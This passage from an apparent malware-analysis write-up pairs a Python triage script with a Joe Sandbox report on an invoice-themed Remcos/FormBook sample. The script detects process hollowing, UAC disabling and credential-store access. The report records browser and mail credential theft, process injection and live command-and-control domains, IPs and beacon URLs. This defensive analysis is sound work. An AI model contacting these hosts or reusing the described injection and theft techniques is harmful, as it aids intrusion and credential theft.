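Source: C:\Users\user\Desktop\sample.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"Jump to behavior
Source: C:\Users\user\Desktop\sample.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
Source: C:\Users\user\Desktop\sample.exeMemory written: C:\Windows\regedit.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\sample.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\sample.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: A40008Jump to behavior
Source: C:\Users\user\Desktop\sample.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
Source: C:\Windows\SysWOW64\wextract.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Windows\SysWOW64\wextract.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Windows\SysWOW64\wextract.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
"""


def parse_rows(text):
    """Return (source, verb, detail) for every row the ROW pattern recognises."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            rows.append((m["src"], m["verb"], m["detail"]))
    return rows


def triage(text):
    """Return [(finding, source, detail)] in row order, with hollowing pairs appended last."""
    findings = []
    created = set()      # (parent, child image) from "Process created"
    mz_written = set()   # (writer, target) where an MZ header landed at the default 0x400000 image base
    for src, verb, detail in parse_rows(text):
        if verb == "Process created":
            image, _, cmdline = detail.partition(' "')   # '<image> "<image>" <args>'
            created.add((src, image))
            m = EXCLUSION.search(cmdline)
            if image.lower().endswith("powershell.exe") and m:
                findings.append(("defender_exclusion", src, m["path"]))
        elif verb == "Memory written":
            m = MEM_WRITE.match(detail)
            if m and m["base"].lower() == "400000" and (m["magic"] or "").upper() == "4D5A":
                mz_written.add((src, m["target"]))
        elif verb == "Registry value created":
            if UAC_OFF.search(detail):
                findings.append(("uac_disabled", src, detail))
        else:  # File opened / Key opened
            if any(p.search(detail) for p in CRED_STORES):
                findings.append(("credential_store_access", src, detail))
    # A child that the same process both spawned and overwrote with a PE image at its image base
    # is the hollowing pattern the report calls "Injects a PE file into a foreign processes".
    for parent, child in sorted(created & mz_written):
        findings.append(("process_hollowing", parent, child))
    return findings


if __name__ == "__main__":
    for kind, src, detail in triage(SAMPLE_ROWS):
        print("%-24s %s -> %s" % (kind, src, detail))
```

            The hollowing rule deliberately requires both the creation and the MZ write from the same parent; a Memory written row on its own (for example the base: A40008 write, or a write without the 4D5A prefix) is recorded but not reported, which keeps ordinary debugger and loader writes out of the result.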

            Remote Access Functionality

Source: Yara match; file source: 4.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; file source: 4.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; file source: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000D.00000002.4140304298.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000E.00000002.4142164546.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000D.00000002.4140267279.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000004.00000002.2075004528.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 0000000C.00000002.4140287170.0000000002670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; file source: 00000004.00000002.2075245562.0000000005A60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (one line per tactic; a number before a technique is the count of matched signatures for that technique, techniques without a number had no match)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 1 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 512 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Modify Registry; 21 Disable or Modify Tools; 151 Virtualization/Sandbox Evasion; 512 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 Timestomp; 1 DLL Side-Loading
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 341 Security Software Discovery; 2 Process Discovery; 151 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 113 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1557059; the graph image is rendered here as text)
Sample: dhl009544554961.INV.PEK.CO.... Start date: 17/11/2024. Architecture: WINDOWS. Score: 100
Contacted domains/IPs: www.booosted.xyz, www.s9gzg9.vip, 23 other IPs or domains
Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 6 other signatures; Performs DNS queries to domains with low reputation (www.booosted.xyz)

dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe (started)
  Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Uses regedit.exe to modify the Windows registry; 4 other signatures
  Started: csc.exe; powershell.exe; WerFault.exe; regedit.exe
csc.exe
  Signatures: Maps a DLL or memory area into another process
  Injected into: rQkTBkrqhGpTBn.exe
powershell.exe
  Signatures: Loading BitLocker PowerShell Module
  Started: WmiPrvSE.exe; conhost.exe
rQkTBkrqhGpTBn.exe (injected by csc.exe)
  Signatures: Found direct / indirect Syscall (likely to bypass EDR)
  Started: wextract.exe
wextract.exe
  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
  Injected into: rQkTBkrqhGpTBn.exe
  Started: firefox.exe
rQkTBkrqhGpTBn.exe (injected by wextract.exe)
  Network: rtpsilva4d.click 67.223.117.169, ports 50029, 50030, 50031 (VIMRO-AS15189US, United States); www.jagdud.store 209.74.64.187, ports 49869, 49884, 49900 (MULTIBAND-NEWHOPEUS, United States); 6 other IPs or domains
  Signatures: Found direct / indirect Syscall (likely to bypass EDR)

Source | Detection | Scanner | Label
dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | 47% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos
dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | 45% | Virustotal |
dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label
funddata-x.net | 0% | Virustotal |
booosted.xyz | 1% | Virustotal |
www.bejho.net | 1% | Virustotal |
arcare.partners | 4% | Virustotal |
Source | Detection | Scanner | Label
http://www.s9gzg9.vip/5hlj/ | 0% | Avira URL Cloud | safe
http://www.funddata-x.net/kgqw/?Y8i=++51ydVD2Go1KxhaP3MVo0+h3G0aMK8VVopxxXyVivx076J57lFiLJq/o16RBKp5kNk8000HSHMzLW5tY9vsaI/mDiKsTd/UPoZk72+lh+5I9xFVF6w9VAA=&gvyXe=EtxTw6OpYVppMB | 0% | Avira URL Cloud | safe
http://www.bearableguy.net/37uf/ | 0% | Avira URL Cloud | safe
http://www.bearableguy.net/37uf/?gvyXe=EtxTw6OpYVppMB&Y8i=ZqyRn0tKBl8eeDqDLfkB30WUCggn+8okKolBQQUOnigkga9xaBFfdezim29wA1t+01108B0pmPLbZAIUtL3722PCxl5Rmd8Hzuf5Mxa3n4hY0LoX5BPpi6c= | 0% | Avira URL Cloud | safe
http://www.nieuws-july202541.sbs/0bvv/ | 0% | Avira URL Cloud | safe
http://www.bejho.net/zhgj/ | 0% | Avira URL Cloud | safe
http://www.extrem.tech/ikn1/?gvyXe=EtxTw6OpYVppMB&Y8i=lK8QPaLm/zhKqJMYNE2sX5D70ErSQQuPCqsI86u1e/xCs+G60RywLXCNnEZxAwXF4d4PTI/6YISBOu+SCh07N1ax9JYA7qzNxjbZ37nRHq3jIobn9Z81aSM= | 0% | Avira URL Cloud | safe
http://www.bandukchi.com/d22y/ | 0% | Avira URL Cloud | safe
https://nojs.domaincntrol.com | 0% | Avira URL Cloud | safe
http://www.gcast.video/9kvp/?Y8i=irFuJh4j2fCN/xdLIJkju+0Ww/aOPRv0cSVSUNzcrQBJ8yd3G+0Gay8rhpLSBKnoinj5jjn5ajFjqPJaFJwFxtDWOxi5ujV2lXqfQRwRqrJQ238DxciUY6U=&gvyXe=EtxTw6OpYVppMB | 100% | Avira URL Cloud | malware
http://www.bejho.net/zhgj/?Y8i=JdcPiMMO58hRVijVJpirz9/V5cix6+KSp2WZxXJhOFhYalpiiMnN1LFcUFae4/RxJfLAk2h1IoFKP2Vwx+6Zjf+Qzw/S6pq9Hcy8Rpyilffl6Uu+pL95yEg=&gvyXe=EtxTw6OpYVppMB | 0% | Avira URL Cloud | safe
http://www.gcast.video/9kvp/ | 100% | Avira URL Cloud | malware
http://www.oneid.ink/wlyv/ | 0% | Avira URL Cloud | safe
http://www.oneid.ink/wlyv/?Y8i=IuREpM7aSitXKjuhE/mFHFDVwD2eRLCYNRFeU3oJFmzodDyLIPB9Z9kG2f5hKEjWCIf9aFQVH3NuQ6OQSrT4GxlP+w8Yb3pAn7KQBwnL39T0VCYIbwJiho8=&gvyXe=EtxTw6OpYVppMB | 0% | Avira URL Cloud | safe
http://www.bandukchi.com/d22y/?Y8i=dxLCwHEd799e6zKzvZNVLcz/EcQwMQKXxfRDzHSBACKu35rXWSMWvF6m2/zFPWSnOOS4JYjJIrjoqVx5R3nGQB+J6unEzU7Qg/zyG7VApaoWeyOXFK3Agjg=&gvyXe=EtxTw6OpYVppMB | 0% | Avira URL Cloud | safe
http://www.everyone.golf/8hrm/?Y8i=/8yNM9wGzpX2p7Gr9OMs8k3Lkit8nMI9nKTTJBalfkMfH6xzxaryHaqGqaSFmjBUY2ej3x2hRFvFhHVuCPrBPiINYkfJGOYYxyYlLdiiR95oU5gTTm7ij0A=&gvyXe=EtxTw6OpYVppMB | 0% | Avira URL Cloud | safe
http://www.booosted.xyz | 0% | Avira URL Cloud | safe
http://www.booosted.xyz/ndw1/ | 0% | Avira URL Cloud | safe
http://www.funddata-x.net/kgqw/ | 0% | Avira URL Cloud | safe
http://www.extrem.tech/ikn1/ | 0% | Avira URL Cloud | safe
http://www.rtpsilva4d.click/e61w/ | 0% | Avira URL Cloud | safe
http://www.nieuws-july202541.sbs/0bvv/?gvyXe=EtxTw6OpYVppMB&Y8i=LsZlfLJLVWn36+29SrbHwZ4luzPZC8QC5ghK6sSKdTzC3J+tSarGA1FPkRmoEIfFSAMLZ+GzwFna9SDLC9K8A7K2msKq/CeIb1Pmlq+zJ/M9UWL1f9QpmJ4= | 0% | Avira URL Cloud | safe
http://www.jagdud.store/ohf8/ | 0% | Avira URL Cloud | safe
http://www.everyone.golf/8hrm/ | 0% | Avira URL Cloud | safe
http://www.jagdud.store/ohf8/?gvyXe=EtxTw6OpYVppMB&Y8i=ll5dDbshsmxjCV2Jki1rRe0WTYojaPmnmIrEqeX5AC+cgPBA3oVXvxxUo0hOqHqzs3EuIGVBpbOb4OwgMNYqD9wq62ogBAVACXMNGlc+5YxBk1nmOhOQVvg= | 0% | Avira URL Cloud | safe
http://www.arcare.partners/veiq/?gvyXe=EtxTw6OpYVppMB&Y8i=ZaCIZuFl7wZEptGr8oGQP+xb0A/J37Yq6QCg9bOCsWn91ieeFGXGB3UxVSoIIHFs/R2ofeQV0TveU8WhT6zXata70k2wUe2St57OOyVKg7CHUyAKXe1z7Nw= | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
funddata-x.net | 3.33.130.190 | true | true | | unknown
booosted.xyz | 3.33.130.190 | true | true | | unknown
www.bejho.net | 64.225.91.73 | true | true | | unknown
arcare.partners | 3.33.130.190 | true | true | | unknown
rtpsilva4d.click | 67.223.117.169 | true | true | | unknown
bearableguy.net | 3.33.130.190 | true | true | | unknown
www.gcast.video | 98.124.224.17 | true | true | | unknown
s9gzg9.vip | 3.33.130.190 | true | true | | unknown
nieuws-july202541.sbs | 162.0.215.33 | true | true | | unknown
everyone.golf | 3.33.130.190 | true | true | | unknown
www.extrem.tech | 13.248.169.48 | true | true | | unknown
www.jagdud.store | 209.74.64.187 | true | true | | unknown
bandukchi.com | 3.33.130.190 | true | true | | unknown
ghs.googlehosted.com | 172.217.18.19 | true | false | | high
www.s9gzg9.vip | unknown | unknown | true | | unknown
www.booosted.xyz | unknown | unknown | true | | unknown
www.bearableguy.net | unknown | unknown | true | | unknown
www.oneid.ink | unknown | unknown | true | | unknown
www.funddata-x.net | unknown | unknown | true | | unknown
www.dagoovis.org | unknown | unknown | true | | unknown
www.arcare.partners | unknown | unknown | true | | unknown
www.rtpsilva4d.click | unknown | unknown | true | | unknown
www.nieuws-july202541.sbs | unknown | unknown | true | | unknown
www.everyone.golf | unknown | unknown | true | | unknown
www.bandukchi.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.funddata-x.net/kgqw/?Y8i=++51ydVD2Go1KxhaP3MVo0+h3G0aMK8VVopxxXyVivx076J57lFiLJq/o16RBKp5kNk8000HSHMzLW5tY9vsaI/mDiKsTd/UPoZk72+lh+5I9xFVF6w9VAA=&gvyXe=EtxTw6OpYVppMB | true | Avira URL Cloud: safe | unknown
http://www.s9gzg9.vip/5hlj/ | true | Avira URL Cloud: safe | unknown
http://www.extrem.tech/ikn1/?gvyXe=EtxTw6OpYVppMB&Y8i=lK8QPaLm/zhKqJMYNE2sX5D70ErSQQuPCqsI86u1e/xCs+G60RywLXCNnEZxAwXF4d4PTI/6YISBOu+SCh07N1ax9JYA7qzNxjbZ37nRHq3jIobn9Z81aSM= | true | Avira URL Cloud: safe | unknown
http://www.bearableguy.net/37uf/?gvyXe=EtxTw6OpYVppMB&Y8i=ZqyRn0tKBl8eeDqDLfkB30WUCggn+8okKolBQQUOnigkga9xaBFfdezim29wA1t+01108B0pmPLbZAIUtL3722PCxl5Rmd8Hzuf5Mxa3n4hY0LoX5BPpi6c= | true | Avira URL Cloud: safe | unknown
http://www.bandukchi.com/d22y/ | true | Avira URL Cloud: safe | unknown
http://www.bejho.net/zhgj/ | true | Avira URL Cloud: safe | unknown
http://www.gcast.video/9kvp/?Y8i=irFuJh4j2fCN/xdLIJkju+0Ww/aOPRv0cSVSUNzcrQBJ8yd3G+0Gay8rhpLSBKnoinj5jjn5ajFjqPJaFJwFxtDWOxi5ujV2lXqfQRwRqrJQ238DxciUY6U=&gvyXe=EtxTw6OpYVppMB | true | Avira URL Cloud: malware | unknown
http://www.bearableguy.net/37uf/ | true | Avira URL Cloud: safe | unknown
http://www.nieuws-july202541.sbs/0bvv/ | true | Avira URL Cloud: safe | unknown
http://www.bejho.net/zhgj/?Y8i=JdcPiMMO58hRVijVJpirz9/V5cix6+KSp2WZxXJhOFhYalpiiMnN1LFcUFae4/RxJfLAk2h1IoFKP2Vwx+6Zjf+Qzw/S6pq9Hcy8Rpyilffl6Uu+pL95yEg=&gvyXe=EtxTw6OpYVppMB | true | Avira URL Cloud: safe | unknown
http://www.gcast.video/9kvp/ | true | Avira URL Cloud: malware | unknown
http://www.oneid.ink/wlyv/?Y8i=IuREpM7aSitXKjuhE/mFHFDVwD2eRLCYNRFeU3oJFmzodDyLIPB9Z9kG2f5hKEjWCIf9aFQVH3NuQ6OQSrT4GxlP+w8Yb3pAn7KQBwnL39T0VCYIbwJiho8=&gvyXe=EtxTw6OpYVppMB | false | Avira URL Cloud: safe | unknown
http://www.funddata-x.net/kgqw/ | true | Avira URL Cloud: safe | unknown
http://www.bandukchi.com/d22y/?Y8i=dxLCwHEd799e6zKzvZNVLcz/EcQwMQKXxfRDzHSBACKu35rXWSMWvF6m2/zFPWSnOOS4JYjJIrjoqVx5R3nGQB+J6unEzU7Qg/zyG7VApaoWeyOXFK3Agjg=&gvyXe=EtxTw6OpYVppMB | true | Avira URL Cloud: safe | unknown
http://www.oneid.ink/wlyv/ | false | Avira URL Cloud: safe | unknown
http://www.everyone.golf/8hrm/?Y8i=/8yNM9wGzpX2p7Gr9OMs8k3Lkit8nMI9nKTTJBalfkMfH6xzxaryHaqGqaSFmjBUY2ej3x2hRFvFhHVuCPrBPiINYkfJGOYYxyYlLdiiR95oU5gTTm7ij0A=&gvyXe=EtxTw6OpYVppMB | true | Avira URL Cloud: safe | unknown
http://www.extrem.tech/ikn1/ | true | Avira URL Cloud: safe | unknown
http://www.booosted.xyz/ndw1/ | true | Avira URL Cloud: safe | unknown
http://www.rtpsilva4d.click/e61w/ | true | Avira URL Cloud: safe | unknown
http://www.nieuws-july202541.sbs/0bvv/?gvyXe=EtxTw6OpYVppMB&Y8i=LsZlfLJLVWn36+29SrbHwZ4luzPZC8QC5ghK6sSKdTzC3J+tSarGA1FPkRmoEIfFSAMLZ+GzwFna9SDLC9K8A7K2msKq/CeIb1Pmlq+zJ/M9UWL1f9QpmJ4= | true | Avira URL Cloud: safe | unknown
http://www.jagdud.store/ohf8/ | true | Avira URL Cloud: safe | unknown
http://www.jagdud.store/ohf8/?gvyXe=EtxTw6OpYVppMB&Y8i=ll5dDbshsmxjCV2Jki1rRe0WTYojaPmnmIrEqeX5AC+cgPBA3oVXvxxUo0hOqHqzs3EuIGVBpbOb4OwgMNYqD9wq62ogBAVACXMNGlc+5YxBk1nmOhOQVvg= | true | Avira URL Cloud: safe | unknown
http://www.everyone.golf/8hrm/ | true | Avira URL Cloud: safe | unknown
http://www.arcare.partners/veiq/?gvyXe=EtxTw6OpYVppMB&Y8i=ZaCIZuFl7wZEptGr8oGQP+xb0A/J37Yq6QCg9bOCsWn91ieeFGXGB3UxVSoIIHFs/R2ofeQV0TveU8WhT6zXata70k2wUe2St57OOyVKg7CHUyAKXe1z7Nw= | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://nojs.domaincntrol.com | wextract.exe, 0000000D.00000002.4141477691.00000000051E6000.00000004.10000000.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000002.4140437478.00000000034A6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://wa.me/94760523025?text=Hi | wextract.exe, 0000000D.00000002.4141477691.000000000619A000.00000004.10000000.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000002.4140437478.000000000445A000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.7.dr | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.booosted.xyz | rQkTBkrqhGpTBn.exe, 0000000E.00000002.4142164546.00000000053F1000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://domaincntrol.com/?orighost= | wextract.exe, 0000000D.00000002.4141477691.00000000051E6000.00000004.10000000.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000002.4140437478.00000000034A6000.00000004.00000001.00040000.00000000.sdmp | false | | high
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer | wextract.exe, 0000000D.00000002.4141477691.000000000569C000.00000004.10000000.00040000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000002.4140437478.000000000395C000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | wextract.exe, 0000000D.00000003.2258704386.0000000007958000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
162.0.215.33 | nieuws-july202541.sbs | Canada | 35893 | ACPCA | true
64.225.91.73 | www.bejho.net | United States | 14061 | DIGITALOCEAN-ASNUS | true
209.74.64.187 | www.jagdud.store | United States | 31744 | MULTIBAND-NEWHOPEUS | true
172.217.18.19 | ghs.googlehosted.com | United States | 15169 | GOOGLEUS | false
13.248.169.48 | www.extrem.tech | United States | 16509 | AMAZON-02US | true
67.223.117.169 | rtpsilva4d.click | United States | 15189 | VIMRO-AS15189US | true
3.33.130.190 | funddata-x.net | United States | 8987 | AMAZONEXPANSIONGB | true
98.124.224.17 | www.gcast.video | United States | 21740 | ENOMAS1US | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1557059
Start date and time: 2024-11-17 08:34:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 57s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@14/11@15/8
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 81%
• Number of executed functions: 160
• Number of non-executed functions: 264
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.73.29
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, PID 6540 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
02:35:04 | API Interceptor | 18x Sleep call for process: powershell.exe modified
02:35:17 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
02:36:16 | API Interceptor | 11652165x Sleep call for process: wextract.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
162.0.215.33 | QUOTE2342534.exe | malicious | FormBook | www.nieuws-july202491.sbs/4bpc/
 | r0000000NT_PDF.exe | malicious | FormBook | www.nieuws-july202491.sbs/rq5n/
 | rInvoiceCM60916_xlx.exe | malicious | FormBook | www.nieuws-july202491.sbs/rq5n/
 | z1SupplyInvoiceCM60916_Doc.exe | malicious | FormBook | www.nieuws-july202491.sbs/rq5n/
64.225.91.73 | 8dPlV2lT8o.exe | malicious | Simda Stealer | qetyhyg.com/login.php
 | 7ObLFE2iMK.exe | malicious | Simda Stealer | qetyhyg.com/login.php
 | UMwpXhA46R.exe | malicious | Simda Stealer | qetyhyg.com/login.php
 | 1fWgBXPgiT.exe | malicious | Simda Stealer | qetyhyg.com/login.php
 | arxtPs1STE.exe | malicious | Simda Stealer | qetyhyg.com/login.php
 | Z8eHwAvqAh.exe | malicious | Simda Stealer | qetyhyg.com/login.php
 | WlCVLbzNph.exe | malicious | Simda Stealer | galynuh.com/login.php
 | Bpfz752pYZ.exe | malicious | Simda Stealer | qetyhyg.com/login.php
 | uavINoSIQh.exe | malicious | Simda Stealer | qetyhyg.com/login.php
 | 7DAKMhINGk.exe | malicious | Simda Stealer | qetyhyg.com/login.php
209.74.64.187 | En88bvC0fc.exe | malicious | FormBook | www.cotxot.info/tf3f/
 | VkTNb6p288.exe | malicious | FormBook | www.techyes.life/rirk/
 | New orde.exe | malicious | FormBook | www.selectox.xyz/b26r/
 | Doc 784-01965670.exe | malicious | FormBook | www.jagdud.store/qxse/
 | BL.exe | malicious | FormBook | www.jagdud.store/qxse/
 | rDRAWINGDWGSINC.exe | malicious | FormBook | www.turnnex.online/dhzn/
 | ROQ_972923.exe | malicious | FormBook | www.goldpal.xyz/ym9o/
 | BILL OF LADDING.exe | malicious | FormBook | www.jagdud.store/qxse/
 | PO59458.exe | malicious | FormBook | www.cotxot.info/fqdb/
 | FDA.exe | malicious | FormBook | www.selectox.xyz/b26r/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.bejho.net | 2ULrUoVwTx.exe | malicious | FormBook, GuLoader | 64.225.91.73
 | rpedido-002297.exe | malicious | FormBook, GuLoader | 64.225.91.73
www.gcast.video | PO-000172483.exe | malicious | FormBook | 98.124.224.17
 | PO-000172483 (2).exe | malicious | FormBook, GuLoader | 98.124.224.17
 | Quotation.exe | malicious | FormBook, GuLoader | 98.124.224.17
 | rPO-000172483.exe | malicious | FormBook | 98.124.224.17
 | PO-000041522.exe | malicious | FormBook | 98.124.224.17
 | Halkbank_Ekstre_20230426_075819_154055.exe | malicious | FormBook | 98.124.224.17
 | PO#071024.exe | malicious | FormBook | 98.124.224.17
 | PO#001498.exe | malicious | FormBook | 98.124.224.17
 | CENA.exe | malicious | FormBook | 98.124.224.17
 | NARLOG 08.10.2024.exe | malicious | FormBook | 98.124.224.17
Match | Associated Sample Name / URL | Detection | Threat Name | Context
DIGITALOCEAN-ASNUS | 11sds_Invoice_9334749.html | malicious | WinSearchAbuse | 68.183.112.81
 | FSVAUIEMDNKSA_Invoice_Pdf.html | malicious | WinSearchAbuse | 68.183.112.81
 | Setup.exe | malicious | Unknown | 167.99.235.203
 | https://mail.outlook-365.com/0fslgu3q29ktmq2d | malicious | Unknown | 68.183.142.105
